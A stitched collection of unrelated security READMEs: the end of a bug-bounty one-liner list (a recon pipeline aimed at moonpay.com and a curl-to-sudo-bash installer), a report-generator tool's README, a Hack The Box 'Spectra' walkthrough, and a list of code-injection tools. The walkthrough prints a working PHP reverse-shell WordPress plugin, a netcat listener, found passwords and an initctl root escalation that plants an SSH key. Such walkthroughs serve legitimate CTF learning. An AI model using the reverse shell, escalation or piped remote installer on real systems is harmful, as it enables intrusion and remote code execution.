's/url://g' | sed 's/^ *//' | sed 's/,//g' ``` ## Recon Oneliner from Stok ``` subfinder -d moonpay.com -silent | anew moonpay-subs.txt | dnsx -resp -silent | anew moonpay-alive-subs-ip.txt | awk '{print $1}' | anew moonpay-alive-subs.txt | naabu -top-ports 1000 -silent | anew moonpay-openports.txt | cut -d ":" -f1 | naabu -passive -silent | anew moonpay-openports.txt | httpx -silent -title -status-code -mc 200,403,400,500 | anew moonpay-web-alive.txt | awk '{print $1}' | gospider -t 10 -q -o moonpaycrawl | anew moonpay-crawled.txt | unfurl format %s://dtp | httpx -silent -title -status-code -mc 403,400,500 | anew moonpay-crawled-interesting.txt | awk '{print $1}' | gau --blacklist eot,svg,woff,ttf,png,jpg,gif,otf,bmp,pdf,mp3,mp4,mov --subs | anew moonpay-gau.txt | httpx -silent -title -status-code -mc 200,403,400,500 | anew moonpay-web-alive.txt | awk '{print $1}'| nuclei -eid expired-ssl,tls-version,ssl-issuer,deprecated-tls,revoked-ssl-certificate,self-signed-ssl,kubernetes-fake-certificate,ssl-dns-names,weak-cipher-suites,mismatched-ssl-certificate,untrusted-root-certificate,metasploit-c2,openssl-detect,default-ssltls-test-page,wordpress-really-simple-ssl,wordpress-ssl-insecure-content-fixer,cname-fingerprint,mx-fingerprint,txt-fingerprint,http-missing-security-headers,nameserver-fingerprint,caa-fingerprint,ptr-fingerprint,wildcard-postmessage,symfony-fosjrouting-bundle,exposed-sharepoint-list,CVE-2022-1595,CVE-2017-5487,weak-cipher-suites,unauthenticated-varnish-cache-purge,dwr-index-detect,sitecore-debug-page,python-metrics,kubernetes-metrics,loqate-api-key,kube-state-metrics,postgres-exporter-metrics,CVE-2000-0114,node-exporter-metrics,kube-state-metrics,prometheus-log,express-stack-trace,apache-filename-enum,debug-vars,elasticsearch,springboot-loggers -ss template-spray | notify -silent ``` ## Update golang ``` curl https://raw.githubusercontent.com/udhos/update-golang/master/update-golang.sh|sudo bash ``` ## Censys CLI ``` censys search "taregt.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' ``` > ***More Scripts Coming Sooon :)*** ____________________________________________________________________________________________________________________________ ## ***Support*** You can Follow me on [LinkedIn](https://www.linkedin.com/in/bhavesh-pardhi-/) and [Twitter](https://twitter.com/Bhavesh_Pardhi_) or if you like my content BUY ME A COFFE <br><br>[![Buy Me a Coffee](https://img.shields.io/badge/Buy%20Me%20a%20Coffee-Support-orange?style=for-the-badge&logo=buy-me-a-coffee)](https://www.buymeacoffee.com/bhaveshpardhi)
<h1 align="center"> <br> <a href="https://github.com/HACKE-RC/webdork"><img src="https://beeimg.com/images/f36886119494.png" alt="webdork" width="600" height="300"></a> <br> ReporterX v1.0 beta <br> </h1> <p align="center">Report writing made easy.</p> # ReporterX Python tool to automate report writing with templates!<br> Suggestions and issues are welcome because I know codes can never be perfect. ## Compatibility Check your Python version by typing in ```bash $ python --version ``` If you get the following ```bash Python 3.9.0 ``` or any version greater than or equal to 3.9, this script has been tested and confirmed to be supported. ## Installation ### For termux ```bash pkg install git -y pkg install python -y git clone https://github.com/RESETHACKER-COMMUNITY/ReporterX cd ReporterX python termux-setup.py ``` ### For Debian-based GNU/Linux distributions ```bash git clone https://github.com/RESETHACKER-COMMUNITY/ReporterX cd ReporterX sudo python3 setup.py ``` ## Usage: ***This is a yaml template based tool(like nuclei is, but it makes reports, instead of finding vulns), The arguments depends upon the template you use.*** ***You can use ```-h``` after selecting a template.*** #### Here is a example : ``` root@rc# ReporterX -t /root/RepoterX/templates/SQL-inection/SQLI-GET.yaml -h usage: main.py [-h] -u URL -p Parameter -user Reporter username [-s Custom Steps to reproduce] [-imp Custom impact] [-rem Custom remediation] [-t Template path] [--silent] [-o] Template based report generator tool. optional arguments: -h, --help show this help message and exit -u URL, --url URL URL where vulnerability exits(with path) -p Parameter, --param Parameter Parameter to append with the URL(with value). -user Reporter username, --username Reporter username Username of the reporter(e.g. @coder_rc). -s Custom Steps to reproduce, --steps Custom Steps to reproduce File path to read steps to reproduce from. -imp Custom impact, --impact Custom impact File path to read impact from. -rem Custom remediation, --remediation Custom remediation File path to remediation from. -t Template path Path of template you want to use. --silent Don't print anything just silently save results. -o , --output Filename to save results in. ``` **For every type of template there is a different usage procedure which is guided [here](/templates)**<br> **For people who wants make templates they can read how to make them [here](/templates)** ## Arguments : - Template path : -t - URL/Domain/Host(with path) : -u, --url - Specify parameter to use(with payload) : -p, --param - Specify organisation name : -on, --orgname - Specify your username to use at the end of the report : -user, --username - Specify custom Steps/Impact/Remediation to read from file and not from original template : -s, --steps, -imp, --impact, -rem, --remediation - Directly save the results without printing anything : --silent # How to use special characters in arguments **Read [here](/templates#How-to-use-special-characters-in-arguments)** ## Shoutout - [RC](https://twitter.com/coder_rc) (myself). - [ResetHacker](https://github.com/RESETHACKER-COMMUNITY). - [InfosecMecha](https://twitter.com/InfosecMecha). **If you like my work consider contacting me on Twitter @coder_rc for donation related information.** ## Demonstrative Video: - https://www.youtube.com/watch?v=FViMJC40V88 **Made with Python by [RC](https://twitter.com/coder_rc)**
<p align="center"><img src="src/banner.png" alt="Banner"></img></p> <p align="center">Creator: <a href="https://app.hackthebox.eu/profile/1190">egre55</a></p> # Personal thoughts Easy peasy lemon squeezy; just need to do a little bit of enumeration, even you don't need any special tenhniques for this box. I tried to explain the steps as simple as I can. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and +respecting my profile in HTB. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img> </a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a> <br><br> Now, let me get right into it. --- # Reconnaissance Let's first start with our classical nmap scan: ```bash nmap -sS -sC -sV -p- 10.10.10.229 ``` ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) | ssh-hostkey: |_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA) 80/tcp open http nginx 1.17.4 |_http-server-header: nginx/1.17.4 |_http-title: Site doesn't have a title (text/html). 3306/tcp open mysql MySQL (unauthorized) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) ``` Here we have two ports except `22/ssh`, let's start enumerating from `80/http`. ## 80/http As you can see, we have a domain with two directories located under. ![](src/webpage.png) First add `spectra.htb` to your `/etc/hosts` file.<br> If we go ahead and have a look at /testing directory, we'll see that we got the whole content of the wordpress directory. ![](src/testingdir.png) __Remember:__ The `wp-config.php` file in the wordpress directories usually has the required credentials for login.<br> But in this case, we find the credentials in the `.save` file of the config file. ![](src/wpcreds.png) - `devtest`:`devteam01` I think we got what we expected to from this directory, moving to `/main` gives us the wordpress site. We also got a username from the first post of wordpress: `administrator` Apart from that, I found an `XSS` in the comments of the first post. But we're going to exploit this box using wordpress reverse shell techniques, that's why there's no need to use `XSS`. So we got the wordpress username, a couple of credentials. Now the scenerio is simple, which is getting a reverse shell through an authenticated wordpress cms. At this point we don't need further enumeration, so I stopped searching for any other interesting things and focused on getting a reverse shell. # Foothold: Wordpress Reverse Shell There are many different ways to get a reverse shell from an authenticated wordpress panel. One of them is to change the content of theme files using the embedded `Theme editor`. But in this writeup, we're going to go with another one, which is uploading a malicious plugin. - Check out [this](https://www.hackingarticles.in/wordpress-reverse-shell/) article for more information and explanation about the topic. First we need to create a file with a reverse shell in it. Don't worry, I'm about to give the file to you : ) __f4T1H.php__ ```php <?php /** * Plugin Name: WordPress Reverse Shell Plugin * Author: f4T1H */ $sock=fsockopen("YOUR_IP_HERE",2121); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?> ``` Then we compress the PHP file into a `.zip` file. And of course start a nc listener. ```bash โ”Œโ”€โ”€(root๐Ÿ’€f4T1H)-[~/hackthebox/spectra] โ””โ”€> zip f4T1H.zip f4T1H.php adding: f4T1H.php (deflated 19%) โ”Œโ”€โ”€(root๐Ÿ’€f4T1H)-[~/hackthebox/spectra] โ””โ”€> nc -lvnp 2121 listening on [any] 2121 ... ``` After that, go authenticate wordpress panel from `http://spectra.htb/main/wp-login.php` and install the plugin. ![](src/plugininstall.png) And activate the reverse shell plugin. ![](src/activate.png) As soon as we activate the plugin, we got a reverse connection on our nc listener... ```bash โ”Œโ”€โ”€(root๐Ÿ’€f4T1H)-[~/hackthebox/spectra] โ””โ”€> nc -lvnp 2121 listening on [any] 2121 ... connect to [10.10.14.30] from (UNKNOWN) [10.10.10.229] 41518 $ id uid=20155(nginx) gid=20156(nginx) groups=20156(nginx) $ ``` # Privilege Escalation: `initctl` ## user part Before escalating to root, we need to escalate user first. After a little bit of enumeration, we encounter an interesting file in /opt/autologin.conf.orig ```bash nginx@spectra ~ $ ls -lah /opt ls -lah /opt total 44K drwxr-xr-x 10 root root 4.0K Feb 3 16:42 . drwxr-xr-x 22 root root 4.0K Feb 2 14:52 .. drwxr-xr-x 2 root root 4.0K Jun 28 2020 VirtualBox -rw-r--r-- 1 root root 978 Feb 3 16:02 autologin.conf.orig drwxr-xr-x 2 root root 4.0K Jan 15 15:53 broadcom drwxr-xr-x 2 root root 4.0K Jan 15 15:54 displaylink drwxr-xr-x 2 root root 4.0K Jan 15 15:53 eeti drwxr-xr-x 5 root root 4.0K Jan 15 15:55 google drwxr-xr-x 6 root root 4.0K Feb 2 15:15 neverware drwxr-xr-x 5 root root 4.0K Jan 15 15:54 tpm1 drwxr-xr-x 5 root root 4.0K Jan 15 15:54 tpm2 nginx@spectra ~ $ file /opt/autologin.conf.orig file /opt/autologin.conf.orig /opt/autologin.conf.orig: ASCII text, with CRLF line terminators nginx@spectra ~ $ cat /opt/autologin.conf.orig cat /opt/autologin.conf.orig # Copyright 2016 The Chromium OS Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. description "Automatic login at boot" author "[email protected]" # After boot-complete starts, the login prompt is visible and is accepting # input. start on started boot-complete script passwd= # Read password from file. The file may optionally end with a newline. for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do if [ -e "${dir}/passwd" ]; then passwd="$(cat "${dir}/passwd")" break fi done if [ -z "${passwd}" ]; then exit 0 fi # Inject keys into the login prompt. # # For this to work, you must have already created an account on the device. # Otherwise, no login prompt appears at boot and the injected keys do the # wrong thing. /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter end scriptnginx@spectra ~ $ ``` As you can see here, the content of `/mnt/stateful_partition/etc/autologin/passwd` is being copied to `/etc/autologin/passwd` when the script is run. So, let's check if `/etc/autologin/passwd` exists! ```bash nginx@spectra ~ $ file /etc/autologin/passwd file /etc/autologin/passwd /etc/autologin/passwd: ASCII text nginx@spectra ~ $ cat /etc/autologin/passwd cat /etc/autologin/passwd SummerHereWeCome!! nginx@spectra ~ $ ``` Looks like we got a password, NICE! ```bash nginx@spectra ~ $cat /etc/passwd | grep /bin/bash cat /etc/passwd | grep /bin/bash root:x:0:0:root:/root:/bin/bash chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash nginx:x:20155:20156::/home/nginx:/bin/bash katie:x:20156:20157::/home/katie:/bin/bash nginx@spectra ~ $ ``` After some hit and try, I came out that this password belongs to user `katie`. ```bash nginx@spectra ~ $ ssh katie@localhost ssh katie@localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes yes Failed to add the host to the list of known hosts (/home/chronos/user/.ssh/known_hosts). Password: SummerHereWeCome!! katie@spectra ~ $ id id uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers) katie@spectra ~ $ ``` Okay, now we can escalate to root, let's start... ## root part Let's see which binaries we can execute with sudo privileges. ```bash katie@spectra ~ $ sudo -l sudo -l User katie may run the following commands on spectra: (ALL) SETENV: NOPASSWD: /sbin/initctl ``` > initctl allows a system administrator to communicate and interact with the Upstart init(8) daemon. Let's first list the jobs: ```bash sudo /sbin/initctl list ``` Okay, here we can try to inject a code by modifying service `test` which is customized service, does not come up as default job. - For more [information](https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9) Here we'll write our public ssh key into the `/root/.ssh/authorized_keys`.<br> You can find your default public ssh key from `~/.ssh/id_rsa.pub` if you generated before. If not, then use `ssh-keygen` command to generate a public-private ssh key pair. I'm giving the codes just in case: ```bash cat - << EOF > /etc/init/test3.conf description "Add pubkey to authorized_keys job" author "f4T1H" start on filesystem or runlevel [2345] stop on shutdown script echo "YOUR PUBLIC SSH KEY HERE" | tee /root/.ssh/authorized_keys end script EOF sudo /sbin/initctl start test3 ``` ![](src/root.png) And we successfully pwned the machine... ![](/src/gifs/pwned.gif) --- # Closing If you liked my writeup, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and +respecting my profile in HTB. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img></a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a> # Resources |`WordPress Reverse Shell`|https://www.hackingarticles.in/wordpress-reverse-shell/| |:-|:-| |__`initctl with sudo`__|__https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9__| <br> ___-Written by f4T1H-___
# [ๆ‰€ๆœ‰ๆ”ถ้›†็ฑป้กน็›ฎ](https://github.com/alphaSeclab/all-my-collection-repos) # Injection - PEๆณจๅ…ฅใ€DLLๆณจๅ…ฅใ€่ฟ›็จ‹ๆณจๅ…ฅใ€็บฟ็จ‹ๆณจๅ…ฅใ€ไปฃ็ ๆณจๅ…ฅใ€Shellcodeๆณจๅ…ฅใ€ELFๆณจๅ…ฅใ€Dylibๆณจๅ…ฅ๏ผŒๅฝ“ๅ‰ๅŒ…ๆ‹ฌ400+ๅทฅๅ…ทๅ’Œ350+ๆ–‡็ซ ๏ผŒๆ นๆฎๅŠŸ่ƒฝ่ฟ›่กŒไบ†็ฒ—็ณ™็š„ๅˆ†็ฑป - [English Version](https://github.com/alphaSeclab/injection-stuff/blob/master/Readme_en.md) # ็›ฎๅฝ• - [PEๆณจๅ…ฅ](#81a3947baa3f99adaf73a8f9766e48fa) -> [(9)ๅทฅๅ…ท](#2642c767c5d89e80c90310fb74e6edb3) [(6)ๆ–‡็ซ ](#f7498d4f9350180b46ad63bedae4ea1b) - [DLLๆณจๅ…ฅ](#4df0a2fb37f3cafbdaef103e982a1b0a) - [(1) ้›†ๅˆ](#4ba9c31b7264396cd7666e6b4a29b3dd) - [(70) ๅทฅๅ…ท](#f7a55b191aab1cb7a57fe44d94b54e1c) - [(92) ๆ–‡็ซ ](#f69bdae6414fe41f7b2ff0a5ae646e0e) - [่ฟ›็จ‹ๆณจๅ…ฅ](#97ceb80739f1d2efce08baaf98dce0fc) -> [(48)ๅทฅๅ…ท](#5ed3d284b106ffdc141f447f59326b00) [(92)ๆ–‡็ซ ](#78df9ff3771ac1e9d9dff3eba0055d25) - [็บฟ็จ‹ๆณจๅ…ฅ](#3b2252d379d384475de4654bd5d0b368) -> [(1)ๅทฅๅ…ท](#9ff33dd10584407a654590a7cf18c6f0) [(9)ๆ–‡็ซ ](#a7433a31e0f33f936d15d6ad61437bc6) - [ไปฃ็ ๆณจๅ…ฅ](#02a1807b6a7131af27e3ed1002e7335a) -> [(47)ๅทฅๅ…ท](#303ed79296c5af9c74cfd49dd31a399e) [(143)ๆ–‡็ซ ](#5e603e03f62d50e6fa8310e15470f233) - [Shellcodeๆณจๅ…ฅ](#a5458e6ee001b754816237b9a2108569) -> [(13)ๅทฅๅ…ท](#28e1b534eae8d37d8fc1d212f0db0263) [(26)ๆ–‡็ซ ](#c6942bb5275f5b62a41238c6042b2b81) - [ELFๆณจๅ…ฅ](#3584002eaa30b92479c1e1c2fc6ce4ef) -> [(7)ๅทฅๅ…ท](#b423b830472372349203f88cf64c6814) [(8)ๆ–‡็ซ ](#0a853f9e3f9ccb0663007d3a508ce02b) - [Dylibๆณจๅ…ฅ](#108c798de24e7ce6fde0cafe99eec5b3) -> [(5)ๅทฅๅ…ท](#12df48702564d73c275c72133546d73e) [(1)ๆ–‡็ซ ](#0af1332c6476d1a8f98046542e925282) - [Android](#06fc9c584b797f97731e3c49886dcc08) -> [(21)ๅทฅๅ…ท](#4c02a0ba65fa4f582ec590ce1e070822) [(10)ๆ–‡็ซ ](#9ff27f3143a5c619b554185069ecffb0) - [ๅ…ถไป–](#4ffa5c3eb1f3b85e4c38f6863f5b76b2) -> [(190)ๅทฅๅ…ท](#fd5f8ada2d4f47c63c3635427873c79c) [(2)ๆ–‡็ซ ](#7004b87c5ab514b352dd7cc91acdd17b) # <a id="81a3947baa3f99adaf73a8f9766e48fa"></a>PEๆณจๅ…ฅ *** ## <a id="2642c767c5d89e80c90310fb74e6edb3"></a>ๅทฅๅ…ท - [**535**ๆ˜Ÿ][20d] [C] [jondonym/peinjector](https://github.com/jondonym/peinjector) peinjector - MITM PE file infector - [**407**ๆ˜Ÿ][5m] [Assembly] [hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode) ๅฐ†PEๆ–‡ไปถ่ฝฌๆขไธบShellcode - [**230**ๆ˜Ÿ][3y] [C++] [secrary/infectpe](https://github.com/secrary/infectpe) Inject custom code into PE file [This project is not maintained anymore] - [**220**ๆ˜Ÿ][2y] [C++] [bromiumlabs/packerattacker](https://github.com/bromiumlabs/packerattacker) C++ application that uses memory and code hooks to detect packers - [**196**ๆ˜Ÿ][30d] [Py] [antonin-deniau/cave_miner](https://github.com/antonin-deniau/cave_miner) Search for code cave in all binaries - [**126**ๆ˜Ÿ][3y] [C++] [gpoulios/ropinjector](https://github.com/gpoulios/ropinjector) ๅฐ†ROP็ผ–็ ็š„shellcodeๆ‰“่กฅไธๅˆฐPEๆ–‡ไปถไธญ - [**119**ๆ˜Ÿ][16d] [C] [hasherezade/chimera_pe](https://github.com/hasherezade/chimera_pe) ChimeraPE (a PE injector type - alternative to: RunPE, ReflectiveLoader, etc) - a template for manual loading of EXE, loading imports payload-side - [**119**ๆ˜Ÿ][16d] [C] [hasherezade/chimera_pe](https://github.com/hasherezade/chimera_pe) ไธ€็งPEๆณจๅ…ฅๅ™จ็ฑปๅž‹-ๅฏๆ›ฟไปฃ:RunPEใ€ReflectiveLoader็ญ‰)-็”จไบŽๆ‰‹ๅŠจๅŠ ่ฝฝEXE็š„ๆจกๆฟ๏ผŒๅŠ ่ฝฝๆ—ถๅฏผๅ…ฅๆœ‰ๆ•ˆ่ดŸ่ฝฝ็ซฏ - [**18**ๆ˜Ÿ][2y] [Py] [ohjeongwook/srdi](https://github.com/ohjeongwook/srdi) *** ## <a id="f7498d4f9350180b46ad63bedae4ea1b"></a>ๆ–‡็ซ  - 2019.01 [fuzzysecurity] [Powershell PE Injection: This is not the Calc you are looking for!](http://fuzzysecurity.com/tutorials/20.html) - 2018.09 [andreafortuna] [Some thoughts about PE Injection](https://www.andreafortuna.org/dfir/some-thoughts-about-pe-injection/) - 2015.09 [n0where] [MITM PE file infector: PEInjector](https://n0where.net/mitm-pe-file-infector-peinjector) - 2014.04 [sevagas] [PE injection explained](https://blog.sevagas.com/?PE-injection-explained) - 2011.10 [pediy] [[ๅŽŸๅˆ›]ๆ„ŸๆŸ“PEๅขžๅŠ ๅฏผๅ…ฅ้กนๅฎž็Žฐๆณจๅ…ฅ](https://bbs.pediy.com/thread-141950.htm) - 2011.04 [codereversing] [Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)](http://www.codereversing.com/blog/archives/92) # <a id="4df0a2fb37f3cafbdaef103e982a1b0a"></a>DLLๆณจๅ…ฅ *** ## <a id="4ba9c31b7264396cd7666e6b4a29b3dd"></a>้›†ๅˆ - [**85**ๆ˜Ÿ][3y] [C++] [benjaminsoelberg/reflectivepeloader](https://github.com/benjaminsoelberg/reflectivepeloader) Reflective PE loader for DLL injection *** ## <a id="f7a55b191aab1cb7a57fe44d94b54e1c"></a>ๅทฅๅ…ท - [**1121**ๆ˜Ÿ][7y] [C] [stephenfewer/reflectivedllinjection](https://github.com/stephenfewer/reflectivedllinjection) ๅๅฐ„DLLๆณจๅ…ฅ๏ผšไธ€็งๅบ“ๆณจๅ…ฅๆŠ€ๆœฏ๏ผŒๅ…ถไธญไฝฟ็”จๅๅฐ„็ผ–็จ‹็š„ๆฆ‚ๅฟตๆฅๆ‰ง่กŒๅบ“ไปŽๅ†…ๅญ˜ๅˆฐไธปๆœบ่ฟ›็จ‹็š„ๅŠ ่ฝฝ - [**1093**ๆ˜Ÿ][11d] [C] [fdiskyou/injectallthethings](https://github.com/fdiskyou/injectallthethings) ๅฎž็Žฐไบ†ๅคšไธชDLLๆณจๅ…ฅๆŠ€ๆœฏ็š„ๅ•Visual Studio้กน็›ฎ - [**747**ๆ˜Ÿ][10m] [C++] [darthton/xenos](https://github.com/darthton/xenos) Windows DLL ๆณจๅ…ฅๅ™จ - [**635**ๆ˜Ÿ][7m] [PS] [monoxgas/srdi](https://github.com/monoxgas/srdi) Shellcodeๅฎž็Žฐ็š„ๅๅฐ„DLLๆณจๅ…ฅใ€‚ๅฐ†DLL่ฝฌๆขไธบไฝ็ฝฎๆ— ๅ…ณ็š„Shellcode - [**489**ๆ˜Ÿ][4m] [C#] [akaion/bleak](https://github.com/akaion/bleak) WindowsๅŽŸ็”ŸDLLๆณจๅ…ฅๅบ“๏ผŒๆ”ฏๆŒๅคš็งๆณจๅ…ฅๆ–นๆณ• - [**385**ๆ˜Ÿ][14d] [C++] [opensecurityresearch/dllinjector](https://github.com/opensecurityresearch/dllinjector) ๅฎž็Žฐๅ„็งๆ–นๆณ•็š„dllๆณจๅ…ฅๅทฅๅ…ท - [**382**ๆ˜Ÿ][13d] [C] [wbenny/injdrv](https://github.com/wbenny/injdrv) ไฝฟ็”จAPCๅฐ†DLLๆณจๅ…ฅ็”จๆˆทๆจกๅผ่ฟ›็จ‹็š„Windows้ฉฑๅŠจ็จ‹ๅบ - [**277**ๆ˜Ÿ][2y] [C++] [gellin/teamviewer_permissions_hook_v1](https://github.com/gellin/teamviewer_permissions_hook_v1) ๅฏๆณจๅ…ฅ็š„c++ dll๏ผŒๅฎƒไฝฟ็”จ่ฃธๅ†…่”่ฟžๆŽฅๅ’Œ็›ดๆŽฅๅ†…ๅญ˜ไฟฎๆ”นๆฅๆ›ดๆ”นๆ‚จ็š„TeamViewerๆƒ้™ - [**268**ๆ˜Ÿ][3y] [C++] [professor-plum/reflective-driver-loader](https://github.com/professor-plum/reflective-driver-loader) ๅๅฐ„ๅ†…ๆ ธ้ฉฑๅŠจๆณจๅ…ฅ๏ผŒไธ€็งๅŸบไบŽๅๅฐ„DLLๆณจๅ…ฅ็š„ๆณจๅ…ฅๆŠ€ๆœฏ๏ผŒ็ป•่ฟ‡Windows้ฉฑๅŠจๅผบๅˆถ็ญพๅ - [**227**ๆ˜Ÿ][10d] [C++] [wunkolo/uwpdumper](https://github.com/wunkolo/uwpdumper) DLLๅ’Œๆณจๅ…ฅๅ™จ๏ผŒ็”จไบŽๅœจ่ฟ่กŒๆ—ถ่ฝฌๅ‚จUWPๅบ”็”จ็จ‹ๅบ๏ผŒไปฅ็ป•่ฟ‡ๅŠ ๅฏ†็š„ๆ–‡ไปถ็ณป็ปŸไฟๆŠค - [**197**ๆ˜Ÿ][2y] [C] [sud01oo/processinjection](https://github.com/sud01oo/ProcessInjection) ไธ€ไบ›่ฟ›็จ‹ๆณจๅ…ฅๆ–นๆณ•็š„ๅฎž็ŽฐๅŠๅˆ†ๆž - [**190**ๆ˜Ÿ][10d] [C++] [hzphreak/vminjector](https://github.com/hzphreak/VMInjector) ไฝฟ็”จ็›ดๆŽฅๅ†…ๅญ˜ๆ“ไฝœๆฅ็ป•่ฟ‡ๅœจVMware Workstation / PlayerไธŠ่ฟ่กŒ็š„ไธป่ฆๆ“ไฝœ็ณป็ปŸ็š„OS็™ปๅฝ•่บซไปฝ้ชŒ่ฏๅฑๅน• - [**185**ๆ˜Ÿ][19d] [C++] [jonatan1024/clrinject](https://github.com/jonatan1024/clrinject) ๅฐ† C๏ผƒEXE ๆˆ– DLL ็จ‹ๅบ้›†ๆณจๅ…ฅไปปๆ„CLR ่ฟ่กŒๆ—ถๆˆ–่€…ๅ…ถไป–่ฟ›็จ‹็š„ AppDomain - [**178**ๆ˜Ÿ][1m] [Py] [infodox/python-dll-injection](https://github.com/infodox/python-dll-injection) Pythonๅทฅๅ…ทๅŒ…๏ผŒ็”จไบŽๅฐ†DLLๆ–‡ไปถๆณจๅ…ฅๅˆฐWindowsไธŠ่ฟ่กŒ็š„่ฟ›็จ‹ไธญ - [**177**ๆ˜Ÿ][11m] [C++] [strivexjun/driverinjectdll](https://github.com/strivexjun/driverinjectdll) ไฝฟ็”จ้ฉฑๅŠจๅ…จๅฑ€ๆณจๅ…ฅdll๏ผŒๅฏไปฅ้š่—dllๆจกๅ— - [**146**ๆ˜Ÿ][4y] [C] [dismantl/improvedreflectivedllinjection](https://github.com/dismantl/improvedreflectivedllinjection) ๅŽŸๅๅฐ„DLLๆณจๅ…ฅๆŠ€ๅทง็š„ๅ‡็บง็‰ˆ๏ผšไฝฟ็”จbootstrap shellไปฃ็ (x86ๆˆ–x64)๏ผŒไปŽๅๅฐ„ๅŠ ่ฝฝๅ™จ่ฐƒ็”จDLL็š„ไปปไฝ•ๅฏผๅ‡บ - [**113**ๆ˜Ÿ][2m] [C] [rsmusllp/syringe](https://github.com/rsmusllp/syringe) ไธ€ไธช้€š็”จ็š„DLLๅ’Œไปฃ็ ๆณจๅ…ฅๅทฅๅ…ท - [**110**ๆ˜Ÿ][7y] [C++] [abhisek/pe-loader-sample](https://github.com/abhisek/pe-loader-sample) ๅŸบไบŽๅๅฐ„DLLๆณจๅ…ฅๆŠ€ๆœฏ็š„ๅ†…ๅญ˜PEๅŠ ่ฝฝๅ™จ - [**87**ๆ˜Ÿ][2m] [C] [countercept/doublepulsar-usermode-injector](https://github.com/countercept/doublepulsar-usermode-injector) ไฝฟ็”จ DOUBLEPULSAR payload ็”จๆˆทๆจกๅผ็š„ Shellcode ๅ‘ๅ…ถไป–่ฟ›็จ‹ๆณจๅ…ฅไปปๆ„ DLL - [**86**ๆ˜Ÿ][3y] [C] [zerosum0x0/threadcontinue](https://github.com/zerosum0x0/threadcontinue) ไฝฟ็”จSetThreadContext()ๅ’ŒNtContinue()็š„ๅๅฐ„DLLๆณจๅ…ฅ - [**82**ๆ˜Ÿ][6m] [C++] [nefarius/injector](https://github.com/nefarius/injector) Command line utility to inject and eject DLLs - [**73**ๆ˜Ÿ][4m] [C] [danielkrupinski/memject](https://github.com/danielkrupinski/memject) Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99. - [**62**ๆ˜Ÿ][15d] [Py] [psychomario/pyinject](https://github.com/psychomario/pyinject) ไธ€ไธชpythonๆจกๅ—๏ผŒๅธฎๅŠฉๅฐ†shellcode/ dllๆณจๅ…ฅๅˆฐwindows่ฟ›็จ‹ไธญ - [**61**ๆ˜Ÿ][3y] [C] [arvanaghi/windows-dll-injector](https://github.com/arvanaghi/windows-dll-injector) ไธ€ไธชๅŸบๆœฌ็š„Windows DLLๆณจๅ…ฅๅ™จๅœจCไฝฟ็”จCreateRemoteThreadๅ’ŒLoadLibrary - [**59**ๆ˜Ÿ][3y] [C++] [azerg/remote_dll_injector](https://github.com/azerg/remote_dll_injector) Stealth DLL injector - [**56**ๆ˜Ÿ][1y] [C] [rapid7/reflectivedllinjection](https://github.com/rapid7/reflectivedllinjection) ไธ€็งๅบ“ๆณจๅ…ฅๆŠ€ๆœฏ๏ผŒๅ…ถไธญไฝฟ็”จๅๅฐ„็ผ–็จ‹็š„ๆฆ‚ๅฟตๅฐ†ๅบ“ไปŽๅ†…ๅญ˜ๅŠ ่ฝฝๅˆฐไธปๆœบ่ฟ›็จ‹ไธญใ€‚ - [**53**ๆ˜Ÿ][5m] [C] [adrianyy/keinject](https://github.com/adrianyy/keinject) Kernel LdrLoadDll injector - [**52**ๆ˜Ÿ][5m] [C] [nccgroup/ncloader](https://github.com/nccgroup/ncloader) A session-0 capable dll injection utility - [**52**ๆ˜Ÿ][3y] [C++] [zer0mem0ry/standardinjection](https://github.com/zer0mem0ry/standardinjection) A simple Dll Injection demonstration - [**51**ๆ˜Ÿ][19d] [C++] [papadp/reflective-injection-detection](https://github.com/papadp/reflective-injection-detection) a program to detect reflective dll injection on a live machine - [**50**ๆ˜Ÿ][1y] [C] [realoriginal/reflective-rewrite](https://github.com/realoriginal/reflective-rewrite) Attempt to rewrite StephenFewers Reflective DLL Injection to make it a little more stealthy. Some code taken from Meterpreter & sRDI. Currently a work in progress. - [**49**ๆ˜Ÿ][3y] [C++] [zodiacon/dllinjectionwiththreadcontext](https://github.com/zodiacon/dllinjectionwiththreadcontext) This is a sample that shows how to leverage SetThreadContext for DLL injection - [**42**ๆ˜Ÿ][3y] [C++] [zer0mem0ry/manualmap](https://github.com/zer0mem0ry/manualmap) A Simple 